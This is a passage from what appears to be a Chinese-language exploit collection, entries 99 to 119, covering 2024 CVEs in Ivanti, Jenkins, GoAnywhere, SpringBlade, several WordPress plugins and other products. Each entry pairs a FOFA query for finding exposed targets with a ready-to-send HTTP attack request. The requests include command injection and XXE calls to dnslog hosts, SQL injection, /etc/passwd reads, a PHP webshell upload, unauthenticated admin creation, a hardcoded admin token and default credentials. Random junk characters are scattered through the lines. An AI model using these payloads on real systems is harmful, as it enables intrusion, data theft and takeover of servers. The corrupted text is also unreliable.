" R- x. Z4 I8 v; \0 j9 l6 y4 q: UX-Requested-With: XMLHttpRequest& w( M, e7 k% z/ f5 J9 @. l5 q
& S A+ \" W3 ~) O: Q9 J
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B9 K0 K' e/ n2 H3 ~
; a8 s1 v( I6 y
& r: |/ F4 G/ r/ ` ^
99. Ncast盈可视高清智能录播系统busiFacade RCE' D" s! p3 Z4 {8 d7 T, ?
CVE-2024-0305
7 m5 Q7 s' U/ B& J5 \% V+ }FOFA:app="Ncast-产品" && title=="高清智能录播系统"5 @9 P$ r2 ]6 c8 |
POST /classes/common/busiFacade.php HTTP/1.1# ]9 n4 ~; w3 O- u2 U
Host: 192.168.40.130:8080; X- }5 O' J+ }! n: q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% E: x2 e7 B. P
Connection: close0 V$ @5 [" R( F( p* g' U9 l; K6 t
Content-Length: 154
; K; v; P3 C- a% f; Y6 UAccept: */*
1 ?4 L2 Q6 L* A; |6 F9 DAccept-Encoding: gzip, deflate
* b1 X Q9 _2 I$ m. u5 E* i: e% jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. a# I$ T* F& d, w3 tContent-Type: application/x-www-form-urlencoded; charset=UTF-8; Q. \# I. o; p( d. s' L
X-Requested-With: XMLHttpRequest1 j9 X4 P1 T$ E! ?
' \" H9 }; }) {2 B+ }7 |
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
4 _6 y/ X' z- l
5 [7 y N4 M0 U B1 i5 @" H( n$ O7 u' i* I
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
$ n: c' v# J5 o/ TCVE-2024-0352( s5 V Z' U, {+ g" y6 O3 j/ ?" \
FOFA:icon_hash="874152924"
9 I# J O7 w7 T$ Q B7 c6 k4 {3 pPOST /api/file/formimage HTTP/1.1
& D5 V+ M' y; X8 v) Z! @" ]Host: 192.168.40.130
7 t6 B4 o: o; _1 ^; q, D5 TUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ o' Y' ^' P1 d1 J
Connection: close v9 I0 W9 n# s `8 t+ l
Content-Length: 2012 I- n* j- a1 i& M) ^) X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
: `6 C# ]1 y# d9 @7 W' H* S' [Accept-Encoding: gzip5 ^0 O* X, R! n" u0 V& k
. z3 R; _ F' p/ S, l------WebKitFormBoundarygcflwtei( w' W- `: j9 }; s$ C; z5 J9 x1 I* `
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
3 V2 `$ b5 [* OContent-Type: application/x-php# |2 r" u' c( ]+ C: s
3 L+ P0 w$ u9 E1 ?* u# [4 z* t2ayyhRXiAsKXL8olvF5s4qqyI2O) G7 [0 x0 ?' G& w$ D& p
------WebKitFormBoundarygcflwtei--) L$ k8 V/ f* Y6 I" Y) R/ L
- A9 m! Z+ N' b. j$ Z
3 s2 A# Z$ Y; S' N# X8 W; z. E3 t101. ivanti policy secure-22.6命令注入- j7 D) T* ^! j
CVE-2024-218876 @% C6 r' P. D1 |
FOFA:body="welcome.cgi?p=logo"0 x! M; j% q% r4 q
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
3 d0 W5 _" K/ ]; H( AHost: x.x.x.xx.x.x.x
: L, F% J# N, t# \" B O$ pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; p6 P3 k, N% ~' a o6 k
Connection: close
- D7 b8 V# K' c& m% c7 cAccept-Encoding: gzip* T9 c9 K- r7 ^& J+ e
0 D/ w- i% j8 _ P
/ P. F9 \+ u/ ?% s
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* B! N u/ c) i& }% F- l$ |
CVE-2024-21893
( I8 p7 T: }2 o T/ _* b; ^FOFA:body="welcome.cgi?p=logo"
- s! E/ t# f7 c4 E4 QPOST /dana-ws/saml20.ws HTTP/1.1! V# t3 t( C9 ?/ c
Host: x.x.x.x, {) s5 w5 D5 t% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: f/ Q7 u# f; v% @- [
Connection: close2 r/ X/ O' Q7 L' r: R {5 B0 D
Content-Length: 792
5 z0 B$ h( ? X) ?Accept-Encoding: gzip7 r* i. \8 {: x3 [5 d
& m% W, ^. P( b; K( T
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>7 u( r6 ^; X- r# S/ n
( z5 ^0 K9 W' ?; F8 K
103. Ivanti Pulse Connect Secure VPN XXE
$ {* L. O6 C" a mCVE-2024-22024
% k5 }- S9 r# y" [$ n0 q) G( [) RFOFA:body="welcome.cgi?p=logo"" S1 I4 V9 x1 S/ r9 f* i
POST /dana-na/auth/saml-sso.cgi HTTP/1.1* E: c6 ]3 I+ y6 D( ?: e' g* S+ Z
Host: 192.168.40.130:111
& }5 N4 P+ Q7 x8 z$ RUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36* \ @% R, v, A1 x
Connection: close
S, O* \8 C5 _$ d* w& mContent-Length: 204
0 Y; W( ]+ `6 T, ?Content-Type: application/x-www-form-urlencoded
0 \# L* J0 B" x9 vAccept-Encoding: gzip
4 w* o$ x+ v! }
C) N7 x& ?5 t1 @SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==3 O2 u. f, W; \, C
7 l3 V. H9 B& k
% n: ]5 n, q$ F w3 W7 v4 @其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
( ^) E* i9 @! R) m! l# \2 {+ l<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>; R6 `$ r" K8 _/ l3 C' M
" w9 x7 S$ R/ Z7 D! S5 X, T# K& L" ]% ^
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露" l9 [1 ~1 t5 ?% q
CVE-2024-0569
! r1 e- r5 v8 V" r* V3 |! pFOFA:title="TOTOLINK"
) H' _7 M3 x, u. T8 G9 }POST /cgi-bin/cstecgi.cgi HTTP/1.1; ?" o( k* X% S! U
Host:192.168.0.10 `' b5 F& [6 R9 D" D' p- z; w8 k! N
Content-Length:41
" x. i5 H: ?9 e) GAccept:application/json,text/javascript,*/*;q=0.017 |* e% ?+ ]3 ]+ S8 R! i
X-Requested-with: XMLHttpRequest
7 D4 \+ h7 o9 ~User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
* y7 l2 ?4 v8 O3 a9 z! ~Content-Type: application/x-www-form-urlencoded:charset=UTF-8+ K3 s8 U, j3 z( P% F' p0 V+ J
Origin: http://192.168.0.1
6 r7 ^2 p2 F$ L% [1 HReferer: http://192.168.0.1/advance/index.html?time=1671152380564% K. P& B8 E7 b5 u' }, H
Accept-Encoding:gzip,deflate
2 N" x2 i# X; p( f: u9 v8 M3 b5 iAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.74 o% v, w3 N1 Z" n+ M
Connection:close% b E" X" X0 `6 w0 s# F) t m6 ~. ^
3 ^& a7 h( `( P! U: f7 l0 v- M{
" h& q) U1 j& s' D r"topicurl":"getSysStatusCfg"," R% M* E: C) V0 {
"token":""
( z0 `0 D: A. e% \}
1 A% m& t% S) J# y
: \2 Z( {/ h4 A, G( A105. SpringBlade v3.2.0 export-user SQL 注入
* I1 s5 |: I# R9 O4 r% IFOFA:body="https://bladex.vip"
" T# I* Q b. J( u9 Q/ lhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1- M% R5 D/ z/ q$ |0 d
# H; O8 V% S: z" b3 o- ]2 J' {106. SpringBlade dict-biz/list SQL 注入, ?; v* U0 B9 Q. X# T, C$ X
FOFA:body="Saber 将不能正常工作"
* ~! `. Y( ~# B3 s! Y4 sGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ F# b. u. U9 Y/ I% e( K
Host: your-ip
e3 B) W7 t7 T. b, rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) d# }0 ~& e# B$ u) d" G* T
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
, x" c& K- g, T/ O2 ^5 L( f" ~Accept-Encoding: gzip, deflate
2 H1 u6 Z0 q8 B3 C; WAccept-Language: zh-CN,zh;q=0.9
+ b& v, R7 |1 A7 `. tConnection: close
8 S7 D# G, x6 [/ ?3 K( t
$ r1 B3 L9 I" s% |: T2 s+ W* e4 L+ ?. J: A9 ~6 U! O
107. SpringBlade tenant/list SQL 注入
( _/ o) ^/ Z* U K/ DFOFA:body="https://bladex.vip"
9 A: o) C/ L$ Q$ r# X( EGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Z, `# x8 S, L% L9 xHost: your-ip9 E* w+ O% P# B: c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; l( D2 E* S. b( `2 A
Blade-Auth:替换为自己的
3 m: g2 V* C" r+ U- y/ N7 Q MConnection: close) O( s% X5 ~7 I, D; W
& x8 k2 ` J2 c
, F" ?5 |- n% ]0 l7 t8 a108. D-Tale 3.9.0 SSRF4 g$ U6 y( E; ^3 Y8 M1 a9 M
CVE-2024-21642' g, k0 \" y! h
FOFA:"dtale/static/images/favicon.png"
0 P; b: Z* r, u( Z: aGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
, ~ [0 C8 u+ X4 J% qHost: your-ip& X x; @8 @. q( T
Accept: application/json, text/plain, */*7 n6 Z4 R8 t. T- w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& j, I' @7 q2 y: dAccept-Encoding: gzip, deflate/ t3 [' F! U* ~3 _: \8 _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.80 N$ n8 D/ r$ |! b( u5 U
Connection: close# @) w3 ^0 W$ R8 n2 J7 I3 P
8 ?- I# ^0 D3 [/ Z9 O8 g6 \$ G& G
P) y, X2 j# u# f3 {109. Jenkins CLI 任意文件读取
. r& i& L6 n( Y- \, h' n: |CVE-2024-23897
1 k3 B0 R! L. e! ?- S( LFOFA:header="X-Jenkins"' L2 T% _' K) V) b# Q
POST /cli?remoting=false HTTP/1.15 C# Q, C/ u& b0 R# T; f' J
Host:
* U( B. n( Y5 t9 nContent-type: application/octet-stream
/ s( ?4 _2 O0 {7 i# S+ X: ^" O8 E8 ^Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92: F" X7 i# U ]: v; y
Side: upload
. s# J8 c, z* s0 R! H. IConnection: keep-alive
5 ~" e7 E6 z) F) D* h/ ~5 VContent-Length: 1635 V, Y4 a ~7 n. w7 x
0 H- f4 j+ q6 n
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03' b5 M, K2 E4 g
% B) e- s% _- E% C( c0 E
4 H" _0 M. @2 n0 F e1 m
POST /cli?remoting=false HTTP/1.1
5 u* G. q; K! {9 p4 D& d6 Z1 `+ OHost:/ _: A/ t! ^ U8 V2 J+ h7 P8 T
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e927 q7 M" ?7 s. l- J4 F( j
download& K. j) v2 i* R, ~0 @) G
Content-Type: application/x-www-form-urlencoded
# K' @$ _7 p; l* D! H+ `: F6 {Content-Length: 0
9 d5 K& N+ _# e+ R7 y. V4 A4 Z' T, _
" w( N' p% m& f& dERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin! `: S; r7 R1 h7 g& b5 ?0 \; @) \0 n
java -jar jenkins-cli.jar help
: e* v5 M# V6 t. W8 Q& L5 v[COMMAND]
# }1 Y" {, ^' }& h! _& V# JLists all the available commands or a detailed description of single command.
! p h3 ~1 m8 H: ?, g8 s COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
/ H, ^" V$ l2 u5 n% H
# [; ?( k# E2 K7 Q6 M* n d0 L2 n P# X$ M
110. Goanywhere MFT 未授权创建管理员
- q3 ]# N# u/ W! z* i C% [5 v {CVE-2024-0204! W- @! i7 d* B1 [# w
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"2 E7 J1 Z. @3 G0 W! u- @
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
. @1 D& G0 \+ P6 x9 W* v1 LHost: 192.168.40.130:8000; {) M3 c& ~ W: N4 q
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.365 w5 R& [: b L; }6 v
Connection: close
/ O+ O/ C- ?0 }# O1 j4 fAccept: */*. t% l3 ?/ m8 ]) X3 J$ j
Accept-Language: en
6 D6 d% c U* t3 [. ~0 EAccept-Encoding: gzip: Z0 B9 W F* d; l a" ^
6 A* A' T9 x l5 t% ~+ `: ~+ k% c
5 |& o8 M! ~$ H6 O! k% ?
111. WordPress Plugin HTML5 Video Player SQL注入# W4 C1 ~3 n! L6 t% G t
CVE-2024-1061 b. j6 _5 ~8 E1 O
FOFA:"wordpress" && body="html5-video-player"9 f& {" J, Y# ~& f6 ] B# J R
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ b6 a- ?: l) j) W
Host: 192.168.40.130:112
, s7 ` {* }3 }( J4 n0 V# VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 d# g2 U: {; {0 ?& D
Connection: close0 J; l( {! C: e
Accept: */*/ k% k; h# [) e: h6 l; K; M9 G" |; T
Accept-Language: en$ S! S, P& }+ \! Z
Accept-Encoding: gzip
+ D0 R% M; P' h, o- c0 F# a: S- L1 [8 \* U6 a( c% c/ v
" B. r6 ?. E5 }) R
112. WordPress Plugin NotificationX SQL 注入4 q- B. [/ i. u: F. Z) r
CVE-2024-1698
5 u2 D' w" _" g3 F) j y( A1 [FOFA:body="/wp-content/plugins/notificationx"
6 F" W- v# C9 H' t. jPOST /wp-json/notificationx/v1/analytics HTTP/1.1
1 t+ Y4 k( G. v, d) o* ^Host: {{Hostname}}
& n/ s9 p( G+ v* x0 L& {6 U P) i# tContent-Type: application/json. n; T' }* \( E, w# J/ y. E" J
- X' `; a$ l8 O4 c
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
1 }2 m: S7 R( o- x2 p k
- V: |9 I3 ~+ ?. {- X, B
' t7 V/ q. u: L113. WordPress Automatic 插件任意文件下载和SSRF
' Z, C8 _1 i2 J: N) e* fCVE-2024-27954% I! F" Q% W0 I$ Q, V1 I% f" N
FOFA:"/wp-content/plugins/wp-automatic"
" V% s- b$ h+ B( ^/ W$ B! U; FGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" ^/ i$ f/ q: P4 D) X3 v# F, s2 f) C
Host: x.x.x.x+ O- u( V6 j' m" j7 Z" _( D
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36: s' y4 v3 v0 m# u y5 N
Connection: close* S' G$ c/ y9 S( O( c. Q, i; M
Accept: */*9 f; Y, F) K8 U& N8 Y4 M
Accept-Language: en
! [: ^% n' S7 x1 l$ h0 p* X& H6 RAccept-Encoding: gzip$ h! b( d: Z6 L# v: J8 ]9 N+ K
/ g" ]- {/ e+ ^6 ]7 D* r3 a E
$ n& Q \" s! Z. U6 i114. WordPress MasterStudy LMS插件 SQL注入$ I- v9 z, n# _* u1 j
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
" Z5 C& g" N) [GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1: Y* i) A' U j. s
Host: your-ip
8 K- Y, E/ Y1 n: EUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ P% e1 g/ [: n4 k
Accept-Charset: utf-8' L$ a* h, K% b7 }( O
Accept-Encoding: gzip, deflate
' k6 n' ]; s6 E( _- E$ CConnection: close
F) x' u8 Z! G. _" u6 X: \4 [% H/ Z5 B( P4 H+ t3 H" H$ v5 t2 u
) T9 G0 ^# L1 G G+ I0 |# _
115. WordPress Bricks Builder <= 1.9.6 RCE6 ]! N9 p" W% ?* A
CVE-2024-25600
6 n1 r5 V& T+ Z3 f, |5 V8 w) oFOFA: body="/wp-content/themes/bricks/"
$ `! W0 d/ [9 b0 S1 {" O第一步,获取网站的nonce值 C" ?8 \8 d- Y- S* O0 j
GET / HTTP/1.10 Q9 C) p5 L9 h* Z0 B
Host: x.x.x.x
* C, h; F; K, z3 Q+ e4 uUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
" ~1 n0 g; I" a- P- \8 H7 JConnection: close; d' |9 y4 \1 t7 F1 }8 ~3 G
Accept-Encoding: gzip
9 s; P" R6 P) _8 \! j. `& K9 \9 R
! k$ O( ], t* v1 k6 M1 R5 I
- g% O6 O; b7 A1 I c( [# @" k第二步替换nonce值,执行命令
+ I; C9 q" q2 OPOST /wp-json/bricks/v1/render_element HTTP/1.1
% v9 E2 v4 c5 q: s% ]) c: v9 }Host: x.x.x.x
`' D- Q% E# f' k# dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) w4 q0 w( R: {7 A1 A+ Z
Connection: close
/ P6 F: |' g3 u+ H! e& EContent-Length: 356( B% S" F) r% @8 a+ E0 {* N
Content-Type: application/json( A2 d5 l9 Y! J4 U" R- L) W
Accept-Encoding: gzip
7 n0 B* y S( H/ t& H
" t8 b9 F' V9 K, D0 V& A{, j" R& A5 E! ~2 S! M
"postId": "1",; A) V% u J7 H* W/ W4 [
"nonce": "第一步获得的值",4 V ~+ L: D; ^' t& m# N
"element": {; b& R6 ]$ L5 A: ^ F# c' g* Q; \
"name": "container",
' V$ u M2 M1 n5 y; @ "settings": {
2 B1 T" T6 |0 e% U "hasLoop": "true",
# s- Z( E/ P. g- g7 r "query": {
" I' q. _6 c5 F0 y, | "useQueryEditor": true,
; z' u4 n+ U1 c' s9 i5 \ "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
+ Z4 Q8 G6 l, M: e) Z M( l) {& b" l "objectType": "post"1 X9 Q7 `$ z% z3 b9 j" d: C
}1 O9 t6 ^- B# m8 S
}
# f1 V: C% B3 Q }( L6 o3 _! w, h/ c; v( w% c
}, k, Q8 g1 @ z5 @! p
4 y: D! t& s& k6 w
9 c) \) o% l2 _# m. h: z116. wordpress js-support-ticket文件上传
% G$ f$ s$ b( tFOFA:body="wp-content/plugins/js-support-ticket") P6 l: l' K( n; M# z! W3 V
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.17 @! O4 Q) P" G& t# v4 y
Host:
?0 e7 q4 [! Z0 P4 h' e* W$ AContent-Type: multipart/form-data; boundary=--------767099171- C4 [5 u- o' S, C% Z* \8 ?8 X4 V
User-Agent: Mozilla/5.0
0 ]! {7 g0 ]. L; [5 ?5 ~% i+ M' t1 c" N. Y1 B+ t7 i3 s1 Q4 C
----------767099171
2 X# U ?, c) r! }Content-Disposition: form-data; name="action"
[& J$ t' ~' D- I- w; x4 r$ D. cconfiguration_saveconfiguration6 |% G9 e+ `- s
----------7670991713 G- c" m6 E5 c
Content-Disposition: form-data; name="form_request"! M3 {, {" x3 @( Y0 S" _6 m* X
jssupportticket+ R2 O9 _+ ?: ~7 x' r3 N
----------767099171
# j9 x$ ?5 k9 M% IContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
" K9 o* k/ |! f0 g4 S9 {) _$ zContent-Type: image/png- T$ w& P" j6 f6 D0 t3 D) N( b
----------767099171--9 h# F0 y2 i4 w/ P3 F! A! ~
( n' G0 L) [* F# X% d& @
- @- j; x! c- ?3 @1 [7 i8 g
117. WordPress LayerSlider插件SQL注入$ Q7 a- I1 H& m( h, O, o6 k2 z2 w- Z
version:7.9.11 – 7.10.0
i: W8 u6 p N. y) y+ K# X$ EFOFA:body="/wp-content/plugins/LayerSlider/"
2 X0 O, Q8 r( S% n5 d) x3 H l9 bGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
4 L" D; A+ j" \. A% F$ XHost: your-ip
* R# e1 j5 d( Z* `6 F0 H GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 [1 A9 Q% O/ _( t- I! [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% ~7 b; z: d1 x S5 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ j5 S# N( v, }& d: Q
Accept-Encoding: gzip, deflate, br- c g7 v* v f3 J& A1 `
Connection: close
- R6 l% b R0 ^+ K; ~. OUpgrade-Insecure-Requests: 1
* Y! }! c4 D. h9 z* u; n
' u9 U+ \' }6 X( r) A3 d9 r& G* h! C
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
f n5 `& Q+ s: U. dCVE-2024-0939$ x! K0 A b& r
FOFA:title="Smart管理平台"$ n: ]; e- P1 n1 B' |
POST /Tool/uploadfile.php? HTTP/1.19 ^0 k: N/ h) m) O. v3 F
Host: 192.168.40.130:8443
/ J1 e/ F+ A5 ~' M; CCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
( j1 S) N" n. Z1 \* d; s& K6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
2 f2 q! h& a' }) t; S* jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ^4 ]) F! a9 t! b+ dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- i+ U* ~3 |8 Q; BAccept-Encoding: gzip, deflate
9 O& E- c" x5 {' bContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828872 m( y3 ?& P) `
Content-Length: 405
' V1 C, R! c( Q+ h1 J. ?3 kOrigin: https://192.168.40.130:8443* t& }+ X, W( C; @: w$ G
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
- o7 R7 C. z) a/ y: EUpgrade-Insecure-Requests: 1
% O' s# Q! u4 K/ \; J7 X/ f5 c% ]% HSec-Fetch-Dest: document
) i4 k8 b4 N- l: SSec-Fetch-Mode: navigate
4 _% H& }* `3 W/ Y+ f6 C2 W2 V$ xSec-Fetch-Site: same-origin4 a8 A' T, b. B; Y# P: h- B& E
Sec-Fetch-User: ?1
, e& [5 ~% o4 qTe: trailers
8 N1 ^/ q5 b9 J: R/ D; pConnection: close
5 Z) {9 H( f1 ~3 X- f
8 \: J4 @& P! |* v-----------------------------13979701222747646634037182887$ r& E% j% Q* r: y, E; S
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
5 c0 U6 V1 `( F3 E+ NContent-Type: application/octet-stream
) \1 B A9 R; J! Q: G0 l4 u! |* _! ?/ F. A0 f" K6 |1 b/ @
<?php$ E$ f7 X' a. y( n8 y
system($_POST["passwd"]);' z& y6 g0 r1 _- A5 X
?># v( n p4 V/ o- v8 W' Q
-----------------------------13979701222747646634037182887
+ \/ f# T2 |/ S+ w8 G' oContent-Disposition: form-data; name="txt_path"
, g6 T7 F! a+ q# x& |) q) K; h2 M% U' J% u' _/ @+ h4 H: o
/home/src.php
5 s& R+ {( q) j* \-----------------------------13979701222747646634037182887--
8 f( E* v6 K" p% F% q2 J" n
1 V/ r+ b- ~7 c5 X
; c! P& V2 x ^1 X& u访问/home/src.php T# F' J" V& s. P9 [/ |! s
& {% U6 L1 _# y6 V119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 u% d, ^* f& ]1 O. CCVE-2024-12549 f% v6 o+ ?" U8 i/ S
FOFA:title="Smart管理平台" x! T. k2 x1 v8 F8 T
先登录进入系统,默认账号密码为admin/admin
$ [/ x `# F' ?" ePOST /sysmanage/sysmanageajax.php HTTP/1.110 t$ Z0 S7 j$ X6 p+ O% g0 `( U$ y
Host: x.x.x.x
) M8 z; r! `$ c0 T' O: iCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee4 l) T9 \3 o1 O! X$ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ S8 x' ^; q4 s) D2 ]Accept: */*4 I; W4 W" D [1 S5 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 l" b4 _1 Q. h; w" b7 B
Accept-Encoding: gzip, deflate
# }+ `# T3 h' D4 Q. JContent-Type: application/x-www-form-urlencoded;; m7 `4 e' ^7 U- v4 W) e# P
Content-Length: 109
: K o6 l/ Z4 J, b% G3 \5 Z+ }Origin: https://58.18.133.60:8443
7 X' M- G3 ^$ F1 v% [Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
) z$ x! B( _0 a0 l* b! oSec-Fetch-Dest: empty
% G% K, p9 v) _6 M$ YSec-Fetch-Mode: cors- D0 ^+ t9 t+ L. `
Sec-Fetch-Site: same-origin
. X M. q9 q2 T7 i9 E PX-Forwarded-For: 1.1.1.1, F5 ^6 G; P8 U7 [( X$ C& d, E
X-Originating-Ip: 1.1.1.1, z: D* Q- z W& O
X-Remote-Ip: 1.1.1.16 |/ ?8 x. X, [+ V7 z! G5 J1 u
X-Remote-Addr: 1.1.1.16 F! g, L' ]9 `( I/ w6 \% i
Te: trailers! R$ g) z" r9 }$ z6 Y* T* t8 O
Connection: close
& A" w# t' s6 y8 I6 @ Y
